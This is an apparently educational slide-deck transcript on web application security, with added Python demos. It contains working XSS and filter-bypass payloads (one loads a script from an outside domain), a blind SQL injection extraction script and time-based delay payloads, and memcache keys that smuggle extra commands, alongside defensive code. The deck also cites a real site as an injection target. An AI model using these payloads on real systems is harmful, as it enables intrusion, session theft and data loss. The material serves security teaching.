Web Application Security (Akademik Bilişim 2016)

Slides from the seminar I gave at Aydın Adnan Menderes Üniversitesi as part of the Akademik Bilişim 2016 event.

  1. Web Application Security, Akademik Bilişim 2016, Ömer Çıtak
  2. #! whoami Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social: @Om3rCitak
  3. #! cat index • Cross-site Scripting (XSS) • SQL Injection • Memcache Injection • Upload Authentication
  4. #! ping-pong.jpg
  5. #! dont-trust-anyone.jpg
  6. #! cross-site-scripting • Reflected XSS • DOM Based XSS • Stored XSS
  7. #! reflected-xss.jpg
  8. #! reflected-xss-poc.jpg
  9. #! dom-based-xss.jpg
  10. #! stored-xss.jpg
  11. #! stored-xss-poc.jpg
  12. #! stored-xss-poc.jpg
  13. #! cat classic-xss-payloads • <script>alert(1)</script> • <img src="javascript:alert('XSS');"> • <IFRAME SRC="javascript:alert('XSS');"></IFRAME> • <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT> • <video src=1 onerror=alert(1)> • <audio src=1 onerror=alert(1)> • <img src=x onerror=alert(1)"> (a javascript: URL in an <img src> only fires in legacy browsers; the onerror event-handler payloads work in current ones)
  14. #! cat xss-bypass-payloads • <scrscriptipt>alalertert(1)</scrscriptipt> (defeats a filter that deletes the words "script" and "alert" once, non-recursively) • alert(String.fromCharCode(88,83,83)) • <IMG SRC=j&#97…………….')> • <IMG SRC='vbscript:msgbox("XSS")'> (Internet Explorer only)
  15. #! xss-protection-1.jpg • Strip Tags – http://php.net/manual/tr/function.strip-tags.php
  16. #! xss-protection-2.jpg • HTML Special Chars – http://php.net/manual/tr/function.htmlspecialchars.php (on PHP versions before 8.1 pass ENT_QUOTES and the charset explicitly, otherwise single quotes are left unencoded)
  17. #! xss-protection-3.jpg • HttpOnly Cookies (session_set_cookie_params)
  18. #! xss-protection-4.jpg
  19. #! xss-protection-4.jpg
  20. #! xss-demo.jpg
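The protection slides above contrast a blacklist filter, strip_tags() and htmlspecialchars(). The block below is an added example, not code from the deck: it shows why the `<scrscriptipt>` payload on slide 14 survives a word-removal filter, why the output encoder has to match the HTML context (text node versus quoted attribute), and how the HttpOnly flag from slide 17 ends up on the Set-Cookie header. It is written in Python rather than the deck's PHP so that it runs stand-alone; `html.escape(quote=True)` plays the role of htmlspecialchars() with ENT_QUOTES and the regex plays the role of strip_tags(). The payloads are copied from slides 13 and 14 except the attribute-breakout one, which is constructed for this example.

```python
import html
import re
from http.cookies import SimpleCookie

# Payloads from the deck's slides 13 and 14.
NESTED_TAG_PAYLOAD = "<scrscriptipt>alalertert(1)</scrscriptipt>"
IMG_ONERROR_PAYLOAD = "<img src=x onerror=alert(1)>"
# Constructed for this example: closes a double-quoted attribute and adds a handler.
ATTR_BREAKOUT_PAYLOAD = 'x" onmouseover="alert(1)'


def naive_blacklist(value: str) -> str:
    """The word-removal filter the nested payload is built to defeat: each
    forbidden word is deleted once, non-recursively, so the text around it
    collapses back into the forbidden word."""
    for bad in ("script", "alert"):
        value = value.replace(bad, "")
    return value


def strip_tags(value: str) -> str:
    """Rough stand-in for PHP strip_tags(): drops anything shaped like a tag.
    It removes markup but does not encode, so it is the wrong tool for data
    that lands inside an attribute value or inside JavaScript."""
    return re.sub(r"<[^>]*>", "", value)


def escape_html_text(value: str) -> str:
    """For text nodes: encoding < > & is enough."""
    return html.escape(value, quote=False)


def escape_html_attr(value: str) -> str:
    """For quoted attribute values: quote=True also encodes " and ' so the
    attacker cannot close the attribute (htmlspecialchars with ENT_QUOTES)."""
    return html.escape(value, quote=True)


def render_comment(author: str, body: str) -> str:
    """Context-aware output: the author goes into an attribute, the body into
    a text node, and each gets the encoder for its own context."""
    return (
        f'<div class="comment" data-author="{escape_html_attr(author)}">'
        f"{escape_html_text(body)}</div>"
    )


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value with HttpOnly (what session_set_cookie_params enables):
    the browser still sends the cookie, but document.cookie cannot read it, so
    a stored XSS cannot simply ship the session id to the attacker."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(naive_blacklist(NESTED_TAG_PAYLOAD))   # the filter rebuilds <script>alert(1)</script>
    print(strip_tags(IMG_ONERROR_PAYLOAD))      # empty string: the whole tag is gone
    print(render_comment(ATTR_BREAKOUT_PAYLOAD, IMG_ONERROR_PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

`naive_blacklist` is the instructive failure: deleting "script" from `<scrscriptipt>` yields `<script>`, which is exactly why a blacklist that does not loop until nothing changes is not a defence at all. `strip_tags` does remove the tag, but it also destroys legitimate `<` characters and gives no protection for data placed inside an attribute or a script block; encoding for the specific output context is the reliable rule.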
  21. #! sql-injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  22. #! union-based-sql-injection.jpg
  23. #! sql-injection-login-bypass.jpg
  24. #! cat blind-sql-injection • What if errors are hidden? (error_reporting(0)) • What if the mysql_* calls are prefixed with "@"?
  25. #! blind-sql-injection.jpg Boss, won't the Creator ask you on the other side: "Boss, why didn't you try Blind Injection?"
  26. #! blind-sql-injection.jpg
  27. #! blind-sql-injection-poc.jpg
  28. #! blind-sql-injection-poc.jpg
  29. #! cat time-based-sql-injection • What if the query running in the background produces no output? – Count query – Update query – Insert query – Delete query – Relationship query
  30. #! time-based-sql-injection.jpg
  31. #! time-based-sql-injection.jpg MySQL Server, Microsoft SQL Server, Oracle Server
  32. #! sql-injection-poc.jpg Amnesty International (amnesty.org.tr)
  33. #! sql-injection-poc.jpg
  34. #! sql-injection-demo.jpg
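Slides 24 to 31 make the blind and time-based cases concrete: with error_reporting(0) and @mysql_query() the page leaks nothing but "found" or "not found", and a background UPDATE or COUNT leaks nothing visible at all. The block below is an added example, not the deck's demo code, written in Python with an in-memory SQLite table standing in for MySQL: a deliberately vulnerable lookup that swallows every error, the boolean-blind loop that still recovers a column from it one character at a time, and the parameterised lookup that the same payload fails against. The table, usernames and hash values are constructed for the example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data; the hashes are placeholders, not real credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", "a1b2c3"), ("omer", "ffee99")],
    )
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """Models a PHP page with error_reporting(0) and @mysql_query(): the input is
    concatenated into the query and the caller learns only found / not found.
    No error text ever reaches the attacker, which is the blind case the deck raises."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the @ operator: the error is swallowed, the page just says "no"


def user_exists_safe(conn: sqlite3.Connection, username: str) -> bool:
    """Parameterised form: the input can only ever be compared as a value."""
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def blind_extract(oracle, column: str, where: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction. `oracle(condition)` returns True when the
    injected SQL condition holds. Each character is found by binary search over
    its code point, about seven requests per character, using
    unicode(substr(...)) in SQLite; on MySQL the same loop uses ASCII(SUBSTRING(...))."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr((SELECT {column} FROM users WHERE {where}),{pos},1)) > {mid}"
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # past the end of the value substr() yields '' and unicode('') is NULL,
            # so no comparison is ever true and the search collapses to 0
            break
        recovered += chr(lo)
    return recovered


def attack(conn: sqlite3.Connection) -> str:
    """Uses the vulnerable page as the oracle: the deck's login-bypass shape
    (x' OR <cond> --) turned into one yes/no question per request."""
    return blind_extract(
        lambda cond: user_exists_vulnerable(conn, f"x' OR {cond} --"),
        column="password_hash",
        where="username = 'admin'",
    )


if __name__ == "__main__":
    db = build_db()
    print(user_exists_vulnerable(db, "x' OR 1=1 --"))  # login bypass succeeds
    print(user_exists_safe(db, "x' OR 1=1 --"))        # same string, treated as data
    print(attack(db))                                  # admin's hash, read blind
```

The time-based variant from slides 29 to 31 is the same loop with a different oracle: when even "found / not found" is unavailable (the injected query is an UPDATE, INSERT, DELETE or a COUNT whose result is never shown), the condition is wrapped in a delay and the response time becomes the answer: `IF(<cond>, SLEEP(5), 0)` on MySQL, `IF <cond> WAITFOR DELAY '0:0:5'` on Microsoft SQL Server, and `DBMS_LOCK.SLEEP(5)` (or `DBMS_PIPE.RECEIVE_MESSAGE` when that package is not granted) on Oracle. The parameterised lookup closes both variants because the input is never parsed as SQL.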
  35. #! memcache-injection
  36. #! using-memcache.jpg
  37. #! phpstorm memcached.php
  38. #! telnet 127.0.0.1 11211
      > set key 0 10 5
      > value
      < STORED
      > get key
      < VALUE key 0 5
      < value
      < END
  39. #! phpstorm memcached.php
  40. #! phpstorm memcached.php
  41. #! phpstorm memcached.php
  42. #! phpstorm memcached.php
  43. #! phpstorm memcached.php
      ?key=omer 0 10 6 \r\n hacked \r\n
      • urlencode('\r') = %0d
      • urlencode('\n') = %0a
      ?key=omer 0 10 6 %0d%0a hacked %0d%0a
  44. #! phpstorm memcached.php
      > set omer 0 3600 6
      > hacked
      < STORED
      > 123456
      < ERROR
  45. #! phpstorm memcached.php
      ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
      ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
      ?key=aaaaa…(251) flush_all %0d%0a
  46. #! cat vulnerable-libraries • Python: python-pylibmc • PHP: Memcached • ASP.NET: memcacheddotnetproject (1.1.5) • Java: com.meetup.memcached
  47. #! cat safe_libraries • Python: python-memcache • PHP: memcache • Java: java.net.spy.memcached
  48. #! cat using-memcached-library • WordPress • Joomla 3.2.2 • Piwik 2.1.0 • MODX Revolution 2.3
  49. #! ascii-table.jpg
  50. #! phpstorm memcached.php
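Slides 38 to 45 show the memcached text protocol and how a key taken straight from the query string can carry \r\n, a NUL byte or more than 250 bytes and so smuggle a second command onto the connection. The block below is an added example, not the deck's memcached.php and not code from any of the libraries on slides 46 and 47, written in Python so it runs offline: it builds the raw bytes an unvalidated client would send, feeds them to a small constructed model of the server's line reader (not memcached's real parser, which additionally answers CLIENT_ERROR for oversized keys), and then applies the protocol's own key rules, which is the check a safe client performs before touching the socket. The key names, the stored values and the flush_all variant without the 251-byte prefix are constructed for the example.

```python
import re

MAX_KEY_LEN = 250  # key length limit in the memcached text protocol


class InvalidKey(ValueError):
    pass


def validate_key(key: str) -> str:
    """Protocol rules: 1..250 bytes, no whitespace, no control characters.
    That rejects the \\r \\n and NUL bytes used on slide 45 as well as the
    251-byte keys."""
    raw = key.encode("utf-8")
    if not raw or len(raw) > MAX_KEY_LEN:
        raise InvalidKey(f"key length {len(raw)} outside 1..{MAX_KEY_LEN}")
    if re.search(rb"[\x00-\x20\x7f]", raw):
        raise InvalidKey("key contains whitespace or control characters")
    return key


def key_is_valid(key: str) -> bool:
    try:
        validate_key(key)
        return True
    except InvalidKey:
        return False


def build_set_unsafe(key: str, value: bytes, exptime: int = 0, flags: int = 0) -> bytes:
    """Bytes from a client that trusts the key (the vulnerable-library case)."""
    return f"set {key} {flags} {exptime} {len(value)}\r\n".encode() + value + b"\r\n"


def build_get_unsafe(key: str) -> bytes:
    return f"get {key}\r\n".encode()


def build_set_safe(key: str, value: bytes, exptime: int = 0, flags: int = 0) -> bytes:
    return build_set_unsafe(validate_key(key), value, exptime, flags)


def build_get_safe(key: str) -> bytes:
    return build_get_unsafe(validate_key(key))


def simulate_server(stream: bytes, store: dict) -> list:
    """Constructed toy model of the server's reader, not memcached's code: every
    CRLF-terminated line is a command and `set` swallows exactly <bytes> bytes of
    data after its line. That is enough to show injected CRLFs splitting one
    request into several."""
    responses, pos = [], 0
    while (end := stream.find(b"\r\n", pos)) != -1:
        parts = stream[pos:end].decode("utf-8", "replace").split()
        pos = end + 2
        if parts and parts[0] == "set" and len(parts) == 5 and parts[4].isdigit():
            n = int(parts[4])
            store[parts[1]] = stream[pos:pos + n]
            pos += n + 2  # data block plus its CRLF
            responses.append("STORED")
        elif parts and parts[0] == "get" and len(parts) >= 2:
            responses += [f"VALUE {k} 0 {len(store[k])}" for k in parts[1:] if k in store]
            responses.append("END")
        elif parts and parts[0] == "flush_all":
            store.clear()
            responses.append("OK")
        else:
            responses.append("ERROR")
    return responses


def run_set_attack():
    """Slides 43/44 replayed: the app does set($_GET['key'], '123456', 3600)
    and the key is 'omer 0 3600 6\\r\\nhacked\\r\\n'."""
    store = {}
    wire = build_set_unsafe("omer 0 3600 6\r\nhacked\r\n", b"123456", exptime=3600)
    return simulate_server(wire, store), store


def run_flush_attack():
    """Slide 45's last payload without the 251-byte prefix: a get whose key
    smuggles flush_all and wipes the whole cache."""
    store = {"omer": b"123456"}
    return simulate_server(build_get_unsafe("omer\r\nflush_all\r\n"), store), store


if __name__ == "__main__":
    print(run_set_attack())    # the attacker's 'hacked' is what gets stored under omer
    print(run_flush_attack())  # flush_all runs, the cache is empty afterwards
    for k in ("omer", "a" * 251, "omer\r\nflush_all\r\n", "a\x00b"):
        print(repr(k[:12]), key_is_valid(k))
```

The split between the two library lists on slides 46 and 47 is exactly the presence or absence of `validate_key`: a client that checks length and character class before formatting the command line cannot be made to emit a second line, whatever the application passes in. Applying the same check in the application is cheap insurance when the library version in use is not known.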
  51. #! upload-authentication
  52. #! upload-authentication-poc
  53. #! wget questions
  54. #! exit Thanks <3 www.omercitak.com Social: @Om3rCitak
